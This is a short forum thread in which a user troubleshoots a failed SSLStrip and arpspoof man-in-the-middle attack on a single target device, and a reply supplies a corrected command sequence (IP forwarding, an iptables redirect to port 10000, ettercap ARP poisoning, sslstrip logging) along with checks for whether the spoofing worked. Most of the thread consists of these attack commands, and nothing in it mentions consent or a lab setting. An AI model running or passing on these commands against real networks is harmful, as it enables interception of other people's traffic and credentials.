Results 1 to 2 of 2

Thread: Problem with SSLStrip/ARPSpoof

  1. #1
    Join Date

    Problem with SSLStrip/ARPSpoof

    Hi, so I've been trying to use sslstrip/arpspoof on this laptop and I've been extremely unsuccessful. I'll list everything I've done in the order that I do it:

    echo 1 >/proc/sys/net/ipv4/ip_forwad
    iptables -t nat -A PREROUTING -p tcp --destination-port -80 -j REDIRECT --to-port 8080
    arpspoof -i wlan0 -t *.*.*.* *.*.*.* (target then gateway, yes I've made sure they're both right)
    arpspoof -i wlan0 -t *.*.*.* *.*.*.* (gateway then target, I've tried doing it with this and without it)
    sslstrip -k -l 8080 -w /root/Desktop/sslstrip.log

    And the log file always comes out empty. My target is an individual device, not multiple. After creating the iptable rule if I type iptables -t nat --list it comes up. Any advice? I also tried ettercap and that wasn't working either. After arpspoofing and the device is used the urls are still https.


  2. #2
    Join Date

    - try to use anoter Port (10000)
    To show if arpspoof works open on the Client CMD or shell an type "arp -a" the gateway an the attacker should have the same MAC-Adress after the arpspoof attack...

    or the better way ist to use ettercap for arp-spoof... shell or GUI..

    for example:

    - ettercap -T -q -i wlan6 F -M arp:remote // / -P autoadd
    - echo 1 >> /proc/sys/net/ipv4/ip_forward
    - iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    - sslstrip -l 10000

    a other way is to use mitmproxy give a look here

    the same work in a network with ettercap arp spoofing.


    p.s not all switch are vunerable for arp-spoofing... google an read way..
    Last edited by ozzy66; 2014-12-19 at 18:55.

Similar Threads

  1. Replies: 0
    Last Post: 2014-01-30, 09:01

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts